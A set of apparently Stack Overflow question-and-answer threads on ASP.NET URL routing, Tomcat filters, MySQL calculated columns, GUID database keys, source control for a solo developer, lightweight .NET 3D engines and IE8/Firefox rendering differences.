this.VirtualPath = virtualPath;
}
public string VirtualPath { get; private set; }
public IHttpHandler GetHttpHandler(RequestContext
requestContext)
{
var page = BuildManager.CreateInstanceFromVirtualPath
(VirtualPath, typeof(Page)) as IHttpHandler;
if (page != null)
{
var routablePage = page as IRoutablePage;
if (routablePage != null) routablePage.RequestContext = requestContext;
}
return page;
}
}
Step 4 - Retrieve the parameter on the target page
Note the implemetation of IRoutablePage.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.Routing;
public partial class users : System.Web.UI.Page, IRoutablePage
{
protected RequestContext requestContext;
protected object RouteValue(string key)
{
return requestContext.RouteData.Values[key];
}
protected void Page_Load(object sender, EventArgs e)
{
string id = RouteValue("userid").ToString();
switch (id)
{
case "1234":
lblUserId.Text = id;
lblUserName.Text = "Bill";
break;
case "1235":
lblUserId.Text = id;
lblUserName.Text = "Claire";
break;
case "1236":
lblUserId.Text = id;
lblUserName.Text = "David";
break;
default:
lblUserId.Text = "0000";
lblUserName.Text = "Unknown";
break;
}
}
#region IRoutablePage Members
public RequestContext RequestContext
{
set { requestContext = value; }
}
#endregion
}
A: This example uses ASP.NET Routing to implement friendly URLs.
Examples of the mappings that the application handles are:
http://samplesite/userid/1234 - http://samplesite/users.aspx?userid=1234
http://samplesite/userid/1235 - http://samplesite/users.aspx?userid=1235
This example uses querystrings and avoids any requirement to modify the code on the aspx page.
Step 1 - add the necessary entries to web.config
<system.web>
<compilation debug="true">
<assemblies>
…
<add assembly="System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</assemblies>
</compilation>
…
<httpModules>
…
<add name="UrlRoutingModule" type="System.Web.Routing.UrlRoutingModule, System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
</httpModules>
</system.web>
<system.webServer>
…
<modules>
…
<add name="UrlRoutingModule" type="System.Web.Routing.UrlRoutingModule, System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</modules>
<handlers
…
<add name="UrlRoutingHandler" preCondition="integratedMode" verb="*" path="UrlRouting.axd" type="System.Web.HttpForbiddenHandler, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
</handlers>
</system.webServer>
Step 2 - add a routing table in global.asax
Define the mapping from the friendly URL to the aspx page, saving the requested userid for later use.
void Application_Start(object sender, EventArgs e)
{
RegisterRoutes(RouteTable.Routes);
}
public static void RegisterRoutes(RouteCollection routes)
{
routes.Add("UseridRoute", new Route
(
"userid/{userid}",
new CustomRouteHandler("~/users.aspx")
));
}
Step 3 - implement the route handler
Add the querystring to the current context before the routing takes place.
using System.Web.Compilation;
using System.Web.UI;
using System.Web;
using System.Web.Routing;
public class CustomRouteHandler : IRouteHandler
{
public CustomRouteHandler(string virtualPath)
{
this.VirtualPath = virtualPath;
}
public string VirtualPath { get; private set; }
public IHttpHandler GetHttpHandler(RequestContext
requestContext)
{
// Add the querystring to the URL in the current context
string queryString = "?userid=" + requestContext.RouteData.Values["userid"];
HttpContext.Current.RewritePath(
string.Concat(
VirtualPath,
queryString));
var page = BuildManager.CreateInstanceFromVirtualPath
(VirtualPath, typeof(Page)) as IHttpHandler;
return page;
}
}
Code from users.aspx
The code on the aspx page for reference.
protected void Page_Load(object sender, EventArgs e)
{
string id = Page.Request.QueryString["userid"];
switch (id)
{
case "1234":
lblUserId.Text = id;
lblUserName.Text = "Bill";
break;
case "1235":
lblUserId.Text = id;
lblUserName.Text = "Claire";
break;
case "1236":
lblUserId.Text = id;
lblUserName.Text = "David";
break;
default:
lblUserId.Text = "0000";
lblUserName.Text = "Unknown";
break;
}
A: Here's another way of doing it using ASP.NET MVC
First off, here's the controller code with two actions. Index gets a list of users from the model, userid gets an individual user:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Mvc;
using System.Web.Mvc.Ajax;
namespace MvcApplication1.Controllers
{
public class UsersController : Controller
{
public ActionResult Index()
{
return View(Models.UserDB.GetUsers());
}
public ActionResult userid(int id)
{
return View(Models.UserDB.GetUser(id));
}
}
}
Here's the Index.asp view, it uses an ActionLink to create links in the correct format:
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Index.aspx.cs" Inherits="MvcApplication1.Views.Index" %>
<%@ Import Namespace="MvcApplication1.Controllers" %>
<%@ Import Namespace="MvcApplication1.Models" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title></title>
</head>
<body>
<div>
<h2>Index of Users</h2>
<ul>
<% foreach (User user in (IEnumerable)ViewData.Model) { %>
<li>
<%= Html.ActionLink(user.name, "userid", new {id = user.id })%>
</li>
<% } %>
</ul>
</div>
</body>
</html>
And here's the userid.aspx view which displays an individual's details:
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="userid.aspx.cs" Inherits="MvcApplication1.Views.Users.userid" %>
<%@ Import Namespace="MvcApplication1.Controllers" %>
<%@ Import Namespace="MvcApplication1.Models" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
</head>
<body>
<div>
<table border ="1">
<tr>
<td>
ID
</td>
<td>
<%=((User)ViewData.Model).id %>
</td>
</tr>
<tr>
<td>
Name
</td>
<td>
<%=((User)ViewData.Model).name %>
</td>
</tr>
</table>
</div>
</body>
</html>
And finally for completeness, here's the model code:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
namespace MvcApplication1.Models
{
public class UserDB
{
private static List<User> users = new List<User>{
new User(){id=12345, name="Bill"},
new User(){id=12346, name="Claire"},
new User(){id=12347, name="David"}
};
public static List<User> GetUsers()
{
return users;
}
public static User GetUser(int id)
{
return users.First(user => user.id == id);
}
}
public class User
{
public int id { get; set; }
public string name { get; set; }
}
}
A: I've been using a URL rewriter by Intelligencia:
http://urlrewriter.net/
It was so easy to configure - maybe an hour to get it all up and running. Very few problems with it...
I'd recommend it, but I should mentioned I've not tried any other ones.
Good luck!
A: Also, check out ASP.NET MVC or if you're set on webforms, the new System.Web.Routing namespace in ASP.NET 3.5 SP1
A: I've developed an open source NuGet library for this problem which implicitly converts EveryMvc/Url to every-mvc/url.
Dashed urls are much more SEO friendly and easier to read. Lowercase URLs tend to create less problems. (More on my blog post)
NuGet Package: https://www.nuget.org/packages/LowercaseDashedRoute/
To install it, simply open the NuGet window in the Visual Studio by right clicking the Project and selecting NuGet Package Manager, and on the "Online" tab type "Lowercase Dashed Route", and it should pop up.
Alternatively, you can run this code in the Package Manager Console:
Install-Package LowercaseDashedRoute
After that you should open App_Start/RouteConfig.cs and comment out existing route.MapRoute(...) call and add this instead:
routes.Add(new LowercaseDashedRoute("{controller}/{action}/{id}",
new RouteValueDictionary(
new { controller = "Home", action = "Index", id = UrlParameter.Optional }),
new DashedRouteHandler()
)
);
That's it. All the urls are lowercase, dashed, and converted implicitly without you doing anything more.
Open Source Project Url: https://github.com/AtaS/lowercase-dashed-route
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45340",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "23"
} |
Q: Tomcat doFilter() invoked with committed response I have a Tomcat Filter that delegates requests to the a handling object depending on the URL. This is the only filter in the FilterChain. I have an Ajax app that hammers this filter with lots of requests.
Recently I noticed an issue where the filter's doFilter method is often called with a committed response as a parameter (Internally, it is the coyote response that is marked committed).
It seems to me that the only way that this can happen is if the recycle() method is not called on this coyote response. I have checked to make sure that I am not keeping references to any of the request, response, outputStream, or writer objects. Additionally, I made sure to close the outputStream in a finally block. However, this doesn't resolve this issue.
This sounds like I am doing something to abuse the servlet container but I am having trouble tracking it down.
A: I have tried using Tomcat 6.16 and 6.18. This is definitely is the only filter in the chain.
It seems that something is keeping a reference to the servlet outputStream. I wrapped the ServletOutputStream in my own OutputStream and then made sure the reference is destroyed. This fixed the issue so that I no longer see a committed response passed in.
This is an odd side effect of holding a reference. But I don't think it qualifies as a Tomcat bug. More likely a bug in ImageIO.createImageOutputStream() that I suspect is holding the reference.
A: What version of Tomcat are you using? To me this sounds like a bug in Tomcat, I can't think of any reason why your doFilter method should be called with a response that's already been committed (if that filter is the only one in the chain, are you sure about this?).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45361",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: Calculated columns in mysql on INSERT statements Let's say that I want to have a table that logs the date and the number of columns in some other table (or really any sort of math / string concat etc).
CREATE TABLE `log` (
`id` INTEGER NOT NULL AUTO_INCREMENT ,
`date` DATETIME NOT NULL ,
`count` INTEGER NOT NULL ,
PRIMARY KEY (`id`)
);
Is it possible to have the count column calculated for me whenever I do an insert?
e.g. do something like:
INSERT INTO log (date='foo');
and have count calculated by mysql.
Obviously I could do it myself by doing a query to get the count and inserting it, but this would be better.
A: Triggers are the best tool for annotating data when a table is changed by insert, update or delete.
To automatically set the date column of a new row in the log with the current date, you'd create a trigger that looked something like this:
create trigger log_date before insert on log
for each row begin
set new.date = current_date()
end;
A: You definitly have to declare what to insert. This should be possible by using the INSERT ... SELECT statement.
INSERT INTO log (date, count)
SELECT DATE() as date, count(id) as count
from foo;
Which should insert a new row into the log table, containing todays date and the number of rows in the foo table. (Assuming the foo table has an id column.. Use the primary key or another indexed column)
A: Why don't you use information_schema.TABLES?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45372",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Good python library for generating audio files? Can anyone recommend a good library for generating an audio file, such as mp3, wav, or even midi, from python?
I've seen recommendations for working with the id tags (song name, artist, etc) in mp3 files, but this is not my goal.
A: See http://wiki.python.org/moin/Audio/ and http://wiki.python.org/moin/PythonInMusic, maybe some of the projects listed there can be of help.
Also, Google is your friend.
A: I've never used it, but check out ounk.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45385",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Accessible controls for ASP.NET In my last job we ended up rewriting the complete ASP.NET stack (forms, controls, validation, postback handling, ajax library etc...) - the reason I was given was that the ASP.NET controls were not accessible enough, not were any of the third party controls that were assessed for the project.
Can anyone point me to good accessible ASP.NET controls that do ajax as well?
Failing that, how would you approach creating accessible, ajax enabled controls?
A: You could take a look at the 'App_Browsers' feature in .NET.
It gives you the opportunity to hook into the rendering engine for each control. The original intention for this was to be able to alter the HTML output of controls depending on the user's browser - but you can also do it for all browsers.
You could also take a look at these control adapters, which make the normal ASP.NET controls 'CSS Friendly'.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45387",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: Advantages and disadvantages of GUID / UUID database keys I've worked on a number of database systems in the past where moving entries between databases would have been made a lot easier if all the database keys had been GUID / UUID values. I've considered going down this path a few times, but there's always a bit of uncertainty, especially around performance and un-read-out-over-the-phone-able URLs.
Has anyone worked extensively with GUIDs in a database? What advantages would I get by going that way, and what are the likely pitfalls?
A: One other small issue to consider with using GUIDS as primary keys if you are also using that column as a clustered index (a relatively common practice). You are going to take a hit on insert because of the nature of a guid not begin sequential in anyway, thus their will be page splits, etc when you insert. Just something to consider if the system is going to have high IO...
A: primary-keys-ids-versus-guids
The Cost of GUIDs as Primary Keys (SQL Server 2000)
Myths, GUID vs. Autoincrement (MySQL 5)
This is realy what you want.
UUID Pros
*
*Unique across every table, every database, every server
*Allows easy merging of records from different databases
*Allows easy distribution of databases across multiple servers
*You can generate IDs anywhere, instead of having to roundtrip to the database
*Most replication scenarios require GUID columns anyway
GUID Cons
*
*It is a whopping 4 times larger than the traditional 4-byte index value; this can have serious performance and storage implications if you're not careful
*Cumbersome to debug (where userid='{BAE7DF4-DDF-3RG-5TY3E3RF456AS10}')
*The generated GUIDs should be partially sequential for best performance (eg, newsequentialid() on SQL 2005) and to enable use of clustered indexes
A: There is one thing that is not really addressed, namely using random (UUIDv4) IDs as primary keys will harm the performance of the primary key index. It will happen whether or not your table is clustered around the key.
RDBMs usually ensure the uniqueness of the primary keys, and ensure the lookups by a key, in a structure called BTree, which is a search tree with a large branching factor (a binary search tree has branching factor of 2). Now, a sequential integer ID would cause the inserts to occur just one side of the tree, leaving most of the leaf nodes untouched. Adding random UUIDs will cause the insertions to split leaf nodes all over the index.
Likewise if the data stored is mostly temporal, it is often the case that the most recent data needs to be accessed and joined against the most. With random UUIDs the patterns will not benefit from this, and will hit more index rows, thereby needing more of the index pages in memory. With sequential IDs if the most-recent data is needed the most, the hot index pages would require less RAM.
A: Advantages:
*
*Can generate them offline.
*Makes replication trivial (as opposed to int's, which makes it REALLY hard)
*ORM's usually like them
*Unique across applications. So We can use the PK's from our CMS (guid) in our app (also guid) and know we are NEVER going to get a clash.
Disadvantages:
*
*Larger space use, but space is cheap(er)
*Can't order by ID to get the insert order.
*Can look ugly in a URL, but really, WTF are you doing putting a REAL DB key in a URL!? (This point disputed in comments below)
*Harder to do manual debugging, but not that hard.
Personally, I use them for most PK's in any system of a decent size, but I got "trained" on a system which was replicated all over the place, so we HAD to have them. YMMV.
I think the duplicate data thing is rubbish - you can get duplicate data however you do it. Surrogate keys are usually frowned upon where ever I've been working. We DO use the WordPress-like system though:
*
*unique ID for the row (GUID/whatever). Never visible to the user.
*public ID is generated ONCE from some field (e.g. the title - make it the-title-of-the-article)
UPDATE:
So this one gets +1'ed a lot, and I thought I should point out a big downside of GUID PK's: Clustered Indexes.
If you have a lot of records, and a clustered index on a GUID, your insert performance will SUCK, as you get inserts in random places in the list of items (that's the point), not at the end (which is quick).
So if you need insert performance, maybe use a auto-inc INT, and generate a GUID if you want to share it with someone else (e.g., showing it to a user in a URL).
A: Advantages:
*
*UUID values are unique between tables and databases. Thats why it can be merge rows between two databases or distributed databases.
*UUID is more safer to pass through url than integer type data.
If one pass UUID through url, attackers can't guess the next id.But if we pass Integer type such as 10, then attackers can guess the next id is 11 then 12 etc.
*UUID can generate offline.
A: Why doesn't anyone mention performance? When you have multiple joins, all based on these nasty GUIDs the performance will go through the floor, been there :(
A: The main advantages are that you can create unique id's without connecting to the database. And id's are globally unique so you can easilly combine data from different databases. These seem like small advantages but have saved me a lot of work in the past.
The main disadvantages are a bit more storage needed (not a problem on modern systems) and the id's are not really human readable. This can be a problem when debugging.
There are some performance problems like index fragmentation. But those are easilly solvable (comb guids by jimmy nillson: http://www.informit.com/articles/article.aspx?p=25862 )
Edit merged my two answers to this question
@Matt Sheppard I think he means that you can duplicate rows with different GUIDs as primary keys. This is an issue with any kind of surrogate key, not just GUIDs. And like he said it is easilly solved by adding meaningfull unique constraints to non-key columns. The alternative is to use a natural key and those have real problems..
A: @Matt Sheppard:
Say you have a table of customers. Surely you don't want a customer to exist in the table more than once, or lots of confusion will happen throughout your sales and logistics departments (especially if the multiple rows about the customer contain different information).
So you have a customer identifier which uniquely identifies the customer and you make sure that the identifier is known by the customer (in invoices), so that the customer and the customer service people have a common reference in case they need to communicate. To guarantee no duplicated customer records, you add a uniqueness-constraint to the table, either through a primary key on the customer identifier or via a NOT NULL + UNIQUE constraint on the customer identifier column.
Next, for some reason (which I can't think of), you are asked to add a GUID column to the customer table and make that the primary key. If the customer identifier column is now left without a uniqueness-guarantee, you are asking for future trouble throughout the organization because the GUIDs will always be unique.
Some "architect" might tell you that "oh, but we handle the real customer uniqueness constraint in our app tier!". Right. Fashion regarding that general purpose programming languages and (especially) middle tier frameworks changes all the time, and will generally never out-live your database. And there is a very good chance that you will at some point need to access the database without going through the present application. == Trouble. (But fortunately, you and the "architect" are long gone, so you will not be there to clean up the mess.) In other words: Do maintain obvious constraints in the database (and in other tiers, as well, if you have the time).
In other words: There may be good reasons to add GUID columns to tables, but please don't fall for the temptation to make that lower your ambitions for consistency within the real (==non-GUID) information.
A: GUIDs may cause you a lot of trouble in the future if they are used as "uniqifiers", letting duplicated data get into your tables. If you want to use GUIDs, please consider still maintaining UNIQUE-constraints on other column(s).
A: One thing not mentioned so far: UUIDs make it much harder to profile data
For web apps at least, it's common to access a resource with the id in the url, like stackoverflow.com/questions/45399. If the id is an integer, this both
*
*provides information about the number of questions (ie September 5th, 2008, the 45,399th question was asked)
*provides a leverage point to iterate through questions (what happens when I increment that by 1? I open the next asked question)
From the first point, I can combine the timestamp from the question and the number to profile how frequently questions are asked and how that changes over time. this matters less on a site like Stack Overflow, with publicly available information, but, depending on context, this may expose sensitive information.
For example, I am a company that offers customers a permissions gated portal. the address is portal.com/profile/{customerId}. If the id is an integer, you could profile the number of customers regardless of being able to see their information by querying for lastKnownCustomerCount + 1 regularly, and checking if the result is 404 - NotFound (customer does not exist) or 403 - Forbidden (customer does exist, but you do not have access to view).
UUIDs non-sequential nature mitigate these issues. This isn't a garunted to prevent profiling, but it's a start.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45399",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "267"
} |
Q: Source control system for single developer What's the recommended source control system for a very small team (one developer)?
Price does not matter. Customer would pay :-)
I'm working on Vista32 with VS 2008 in C++ and later in C# and with WPF. Setting up an extra (physical) server for this seems overkill to me. Any opinions?
A: I use Mercurial. It runs a treat running stand alone on my Vista development system with no other dependencies required. I use the command line but there's also TortoiseHG to integrate with Explorer.
Two comments:
*
*There are other tools which probably integrate with VS better. I think Subversion has nice VS plug ins.
*The benefit of a separate server is that it's a nice backup of all your work in case your HDD dies on you etc. so discount having one.
Edit: @Slartibartfast - if you just want to run source code control on a single machine a Distributed Source Code Control tool like git or Mercurial is ideal since they're designed to run complete repositories on a machine without the overhead of a server. The fact that you never connect your repository to anyone else's to push and pull changes doesn't mean that tool won't be right.
A: You can use Vault from SourceGear, the replacement tool for visual studio source safe.
The IDE is integrated in Visual Studio.
The tool is free for single user.
More information: http://www.sourcegear.com/vault/index.html
A: I would use Subversion (in fact I use it) [update: Jul 2014 -- I use Git -- see end of the answer].
SVN is:
*
*free,
*good enough (see disadvantages below),
*simple,
*works fine on Windows (and Linux too),
*a lot of people use it so it's easy to get help,
*can integrate with most of IDEs i.e. Visual Studio (i.e. ankhsvn or VisualSVN -- more info) or Eclipse (i.e. Subclipse -- here someone asked about that).
I would strongly recommended separate machine to source control server. At best somewhere on the cloud. Advantages:
*
*You don't lost your source control repositories if your development box dies.
*You don't have to worry about maintenance of one more box.
There are companies which host SVN repositories.
Here are links to SVN (client and server) packages for various operating systems.
Disadvantages of SVN
I am using SVN on Windows machine for about 5 years and found that SVN has a few disadvantages :).
It is slow on large repositories
SVN (or its client -- TortoiseSVN) has one big disadvantage -- it terrible slow (while updating or committing) on large (thousands of files) repositories unless you have SSD drive.
Merging can be difficult
Many people complain about how hard merging is with SVN.
I do merging for about 4 years (including about 2 years in CVS -- that was terrible, but doable) and about 2 years with SVN.
And personally I don't find it hard -- on the other hand -- any merge is easy after merging branches in CVS :).
I do merge of large repository (two repositories in fact) once a week and rarely I have conflicts which are hard to solve (most of conflicts are solved automatically with diff software which I use).
However in case of project of a few developers merging should not be problem at all if you keep a few simple rules:
*
*merge changes often,
*avoid active development in various branches simultaneously.
Added in July 2011
Many devs recommended Distributed Version Control like Git or Mercurial.
From single developer perspective there are only a few important advantages of DVCS over SVN:
*
*DVCS can be faster.
*You can commit to local repository without access to central one.
*DVCS is hot thing and fancy to use/learn (if someone pay for your learning).
And I don't think merging is a problem in case of single developer.
Joel Spolsky wrote tutorial about Mercurial which is definitively worth to read.
So, despite of many advantages of DVCS I would stay with SVN if merging or speed is not a problem.
Or try Mercurial, which according to this and this SO questions, is better supported (in July 2011) on Windows.
Added in July 2014
For about a year I use Git (Git Bash mainly) for my pet-projects (i.e. solving Euler problems) and local branches for each Euler problem are really nice feature -- exactly as it is described as advantage of DVCS.
Today Git tooling on Windows is much, much better then 2 or more years ago.
You can use remote repo (like GitHub or ProjectLocker and many others) to keep
copy of your project away from your workstation with no extra effort/money.
However I use GUI client only to looks at diffs (and sometimes to choose files to commit),
so it's better to not afraid of command line -- it's really nice.
So as of today I would go with Git.
A: I would also recommend Mercurial. It's command set is much like the one found in Subversion, so the learning curve is not that steep. As mentioned earlier, it's designed to run locally, but it's also easy to share/merge changes across computers, or even just push it to a remote server for backups.
It offers excellent tools, like TortoiseHG, and it has good plugins for NetBeans and Eclipse. It also runs natively on Win32, as it's written in Python.
If you don't want to set up a server yourself (for backups, e.g.), there are free hosting providers available; there's a comprehensive list on The Mercurial Wiki.
A: There are two possible solutions for your problem: centralized VCS or Distributed VCS (DVCS).
Centralized VCS like Subversion would satisfy you feature for committing and browsing the log. It also enables you to safely store your repository to another computer which should be one of your major goals as hard drive failure is always a possibility. However, using Subversion the history still resides only at the central location making it vulnerable and you stated that you do not want to have another server.
Distributed Version Control Systems (DVCS) such as Mercurial and Git enable you to do more complex operations on your repository. With both of those tools the whole repository resides with the same computer making it bit easier to make backups and using the repository with another computer e.g. laptop. While Mercurial might seem complex at first the operations you would use with subversion are pretty much the same with Mercurial. Therefore there is no extra overhead to get started if you already know Subversion and you can easily use more advanced features of Mercurial later.
You should be able to find online repository service for your Mercurial repository enabling you to make easy backups and do collaboration some day if you have the need for it.
My recommendation is Mercurial with TortoiseHg.
A: A source control system doesn't care if there's only one developer involved :)
I would recommend that you use a source control system that you've used before and liked.
If you like vs 2008 integration of the source control system however I would go with TFS although I never had the experience to set it up but it shouldn't be so hard.
Another possibility is to use svn (you'll find some servers on google) and use Tortoisesvn that integrates into the windows shell and is nice to work with.
A: A number of the posts advocate putting the repository on a server because it provides redundancy. I don't think this is all that helpful for a single user. Using a separate server machine adds a lot of complexity, but it doesn't buy much redundancy: if you lose the server machine, you still have the current sources on your development machine, but you may have lost ALL your history. Putting the repository on a server does make sense if that server is being regularly backed up. Using an exernal hosting service for the repository can provide storage redundancy, but you're at the mercy of the external service AND you need an internet connection to access the repository. If you use an external host, make frequent backups of the repository that you keep control of!
I would presonally recommend TortoiseSVN using a local file based repository. Just make sure you backup the local repository to a second machine or external media (such as CD-ROMs) on a regular basis.
A: I would definitely recommend git
Works great for both big and small teams. Only drawback is poor native windows support. Although it works fine for me in Cygwin. There also exists a native windows port.
Some of its benefits:
*
*Excellent support for a non-linear work flow. Its branching and merging is far better than eg Subversion.
*Good tools to navigate your repository
*Handles large projects well.
*It is not possible to modify the history without changing the cryptographic signature of your repository
*With its non monolithic design, it is easy to script.
Some people find that it has a steep learning curve. But once you understand it you can do almost anything you would want with it.
A: I'd recommend two things:
First up, that other server - what happens if your machine dies? the house burns down? etc. Having it on another machine is a good idea from a redundancy point of view.
The second one is WHAT:
If you are very familiar with visual source(un)safe, think about SourceGearVault. It's VERY nice, very fast, and very much a vastly improved "clone" of VSS (ie works the same way from the users POV, not under the hood). Needs SQL server and windows tho (it's .NET + SQL server). Free for 1 user.
Of you are not, then I suggest you do one of two things:
First, get VisualSVN. It's great, works with VS2008 really well.
Second, if you MUST run it locally, get VisualSVN server (free!). Make sure you have a good backup plan. Runs on XP/2003/2008/Vista etc.It's just Apache + SVN, under the hood, so it just saves you on the setup - took me 5 mins to install and have it running.
OR, and I prefer this one:
go somewhere like Unfuddle, Dreamhost etc, and get hosting for SVN. It's private, it's fast, and most of all - it's OFFSITE. My dreamhsot account, with something crazy like 500GB of storage and 1-2TB of transfer/month costs about $6/month! There are others which do SVN hosting + bug tracking etc. Look around.
But yeah - SVN is the schizzzznit.you could create a local repository, but I like having a remote, backed up server.
TFS is total, utter overkill for 1 developer (or <5 IMO)
A: I realize that cost isn't a problem but a nice free solution that wouldn't involve checking in and out would be to host the code within Dropbox by doing this you'd instantly get versioning and backup which are the main features that a single developer system would provide.
A: Bazaar is a good version control system. I like to use it for my linux configs because you don't need to create a separate repo.
A: A while back I did a how-to blog post on using SVN with only one developer.
I called it Single serving source control
A: Go for subversion and tortoiseSVN, you don't need to set it up on a server.
*
*Costs are zero
*The subversion documentation is great and fun to read
*tortoiseSVN is a very convenient client
A: Subversion has very low barrier to entry.
TortoiseSVN is a free client, and integrates into your explorer- i.e. in right mouse click menu.
The repository can be just a directory somewhere on your PC or on a network drive. Backing up just means zipping up this directory
There are a few plugins to Visual studio for Subversion, AnkSvn is one I have used, it is free and integrates nicely (i.e it will be smart about moving and deleting files etc)
Subversion is a good choice for one developer.
Update:
Since this post, I've been using Mercurial. It is a Distributed SVN. The 'distributed' aspect may not be directly useful to a sole developer, however it is better at merging and is somewhat faster. There is also a free and good Windows Explorer extension client - Tortoise Hg.
So in summary, if you are the sort of person who will work on many branches at once (doing spikes etc) or if you work on multiple PCs at once and would like full offline access to checkin history on both, then Mercurial. If you just want simple tracking and a well proven and easy to understand solution, then Subversion.
A: Sourcegear's Vault is a great option, it runs on SqlServer and it has been around for many years. I would not use any version of VSS (Visual Source Safe).
A: I'm surprised no one has mentioned Perforce. It's free for 2 people, blazingly fast, and integrates with VS. Also source server has bindings for it by default.
In addition to source control, it really is worthwhile to complete the loop and setup a symbol server and a source server, so that you have simple debugging of anything you've shipped (e.g. no more searching for pdbs or source that match the binary). Both source and symbol server are completely free and supported in VS since 2005.
A: Well, for start, you don't need distributed one :)
I'm not sure what this physical part means, because you could put svn server on your own machine in little trouble.
On the other hand, NetBeans have local history module that logs all local changes of a file. Maybe something like that would be enough for you if Visual Studio have something similar.
A: I would recommend Subversion since it's for single developer and I assume that you're not doing complex merging and lots of log/history checking.
Seems like many people are using http://svnrepository.com/ for their hosting. It comes with Trac and even Git if you need it later.
A: Some good answers here.
I want to re-iterate the suggestion to use a separate computer to host the source control server, although it doesn't have to be a dedicated machine. It could be your Windows Home Server box, or some other server you're already running. Or it could be a virtual machine hosted on some other server. Whatever, just make it separate from the machine(s) where you write code.
I also want to suggest that you get a good backup discipline for your server. Something nightly at least; hourly if you can. Back up to a dedicated device (like an external hard drive) or something offsite (a server in your cousin's house in another state) or in the cloud (Amazon S3). Remember that your source code is your key asset; take care of it!
A: I've been working with Bazaar now for a few weeks and really like it. I'm a linux developer so don't really know much about Tortois but if you like it you should know that there is a Tortoisbzr
A: Hands down I would use git, and I believe many reasons why a single-developer would like to use git are hinted at or described in git magic
A: I use Springloops - version control tool for developers
*
*SVN / Git version control
*Automatic deployment to servers
*Create repositories
*Invite people
*Import files
*Great support
So, try Springloops
A: I dont see why the fact that your one developer changes anything on the source control issue. I would follow the same system (in fact I do on my solo projects). I use wush.net (svn and trac) in those cases. It's fast to set up and dont require that you yourself do or know any server issues. I recommend you use something like this.
A: I would recommend using subversion. Many have recommended using a seperate box as a server, in case your dev machine dies. What happens when the SVN server dies? The answer here is that no matter where you choose to run the server, ensure you always do frequent backups, possibly automated daily to some secondary, preferrebly offsite machine.
A: I use Perforce as well for my own personal stuff, mainly because we use it at work. There are emacs bindings for it as well, so you can sync, check stuff in or out, etc. all from within emacs.
A: I recently moved my studio from Subversion to Perforce and put some notes about it, sort of a postmortem, on my blog here. Hope it's useful.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45400",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "57"
} |
Q: Lightweight 3D Graphics Engine .NET (Compact and Full Framework) I am creating a GUI for a machine that runs remote (WinXP) or on the machine itself (Windows CE 6.0).
Right now I've created a fast visualisation (read: very simple) of the machine itself. The goal is to make a bit more complex visualisation of the machine and for that I would need a lightweight 3d engine.
The engine should run on both full and compact .net framework (I am prepared to do some porting :).
What I mean with lightweigt is that it doesn't need shading, lighting, advanced camera's. The Idea is that the whole scene is shown in Isometric perspective.
So what I was wondering is that anyone knows a good engine (open source?) or has some helpfull resources you could share with me.
A: Did you try Irrlicht.
Recently Irrlicht has acquired official .NET bindings, allowing users to develop in .Net languages such as VB.NET, C# and Boo.
There is also Ogre 3D and also Axiom Engine
A: It is a good question. I have looked as well, and not seen anything. It would be great to see some easy to access great visual effects for mobile, to somewhat compete with other platforms that are getting better looking.
Sometimes with Windows Mobile I feel like I am in the Windows 3.1 days!
A: TrueEngine 3d sdk may also be of interest to you.
A: There is also SlimDX
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45401",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Is there any difference between the box models of IE8 and Firefox3? What are the main differences (if any) between the box models of IE8 and Firefox3?
Are they the same now?
What are the other main differences between these two browsers? Can a web developer assume that these two browsers as the same since they (seem to) support the latest web standards?
A: I would never assume that any browser renders a page exactly the same.. always test!
Even though they support standards, there are plenty of variations between different browsers and even different versions. FF1 renders differently to FF2 which renders differently to FF3.
You also have to remember that each browser has their own JavaScript engine which again, will cause some scripts to work and other to fail.
You can ofcourse reduce these differences by using CSS and JavaScript frameworks which have been developed to support multiple browsers.
However, you still must test in all browsers. There will always be something that doesn't quite look or behave right.
A: The Internet Explorer box model has been "fixed" since Internet Explorer 6 so long as your pages are in standard compliants mode.
See: Quirks mode and Internet Explorer box model bug.
Until I learnt about doctype declerations getting IE to work properly was a real PAIN, because IE runs in "quirks mode" by default. So having a standards mode doctype will eliminate a whole bunch of the most painful CSS problems.
A: Things that will always differ between the two (and other browsers) are default values (font sizes in headings, for example). The way they achieve default visuals is often different, as well, such as whether or not they use padding or margin to achieve the indentation in bulleted lists.
Something quite positive that I just noticed is that IE8 finally fixes IE's handling of margin: 0 auto for block elements that you want horizontally centered in their respective parents.
| {
"language": "en",
